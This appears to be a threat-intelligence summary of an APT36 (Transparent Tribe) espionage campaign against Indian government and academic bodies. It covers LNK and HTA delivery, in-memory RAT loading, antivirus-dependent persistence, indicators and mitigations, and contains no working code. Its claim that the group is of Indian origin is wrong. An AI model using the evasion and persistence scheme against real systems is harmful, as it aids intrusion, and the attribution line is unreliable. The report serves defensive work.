Full Report
The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts. "The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document
Analysis Summary
# Threat Actor: Transparent Tribe
## Attribution & Identity
* **Identification:** Threat actor known as Transparent Tribe (also referred to as APT36).
* **Attribution:** Assessed to be a state-sponsored adversary of Indian origin.
* **Known Aliases:** APT36.
* **Historical Activity:** Active since at least 2013, known for mounting cyber espionage campaigns.
## Activity Summary
Transparent Tribe has launched a fresh set of cyber espionage attacks targeting Indian governmental, academic, and strategic entities. The primary goal of these attacks is to gain persistent control over compromised hosts via a Remote Access Trojan (RAT). Recent activity includes exploiting social engineering with deceptive delivery techniques and separately using a .NET-based loader dropped via a shortcut file disguised as a government advisory PDF.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Employing spear-phishing emails containing a ZIP archive holding a weaponized Windows shortcut (.LNK) file masquerading as a legitimate PDF document (including embedded PDF content to evade suspicion).
* **Execution:**
* The LNK file triggers the execution of a Remote HTML Application (.HTA) script using `mshta.exe`.
* The HTA script leverages ActiveX objects, specifically `WScript.Shell`, for environment profiling and runtime manipulation.
* In a secondary campaign example, a shortcut executes an obfuscated command via `cmd.exe` to retrieve an MSI installer from a remote server.
* **Payload Deployment:** The HTA payload decrypts and loads the final RAT payload directly into memory. A decoy PDF is opened in tandem to reduce user suspicion.
* **Persistence:** Persistence mechanisms adapt based on detected Antivirus (AV) solutions:
* **If Kapersky detected:** Creates a directory under `C:\Users\Public\core\`, drops an obfuscated HTA payload to disk, and establishes persistence via a LNK file in the Windows Startup folder.
* **If Quick Heal detected:** Creates a batch file and a malicious LNK file in the Windows Startup folder, writes the HTA payload to disk, and calls it via the batch script.
* **If Avast, AVG, or Avira detected:** Directly copies the payload into the Startup directory and executes it.
* **If no recognized AV detected:** Falls back to a combination of batch file execution, registry-based persistence, and payload deployment.
* **Capabilities (RAT):** A fully-featured RAT, implemented as `iinneldc.dll`, supports remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
## Targeting
* **Sectors:** Governmental entities, academic institutions, and strategic entities.
* **Geography:** India.
* **Victims:** Indian government, Indian academia.
## Tools & Infrastructure
* **Malware Families Used:** Remote Access Trojans (RATs).
* **Known RATs used historically/recently:** CapraRAT, Crimson RAT, ElizaRAT, DeskRAT.
* **Latest Payload:** A DLL named `iinneldc.dll` functioning as the main RAT.
* **Other Components:** .NET-based loader, malicious DLLs (`pdf.dll`, `wininet.dll`), `PcDirvs.exe`.
* **Infrastructure (Defanged):**
* Remote server retrieving components: `aeroclubofindia[.]co[.]in` (used in the shortcut campaign example).
## Implications
Transparent Tribe remains a highly persistent and strategically driven cyber-espionage threat. Their sustained focus on intelligence collection targets high-value Indian government and educational sectors, utilizing sophisticated anti-AV evasion techniques and adaptive persistence methods to ensure long-term access.
## Mitigations
* (Not explicitly mentioned in the article, but inferred from TTPs): Implement stringent email filtering to block malicious LNK/ZIP attachments. Ensure users are educated on social engineering tactics specifically involving fake file extensions (e.g., shortcuts masquerading as PDFs). Monitor for unusual execution patterns involving `mshta.exe` and suspicious activity within the Windows Startup folder or public user directories. Implement strong endpoint detection and response (EDR) tuned to detect memory-only payloads to counter fileless execution techniques.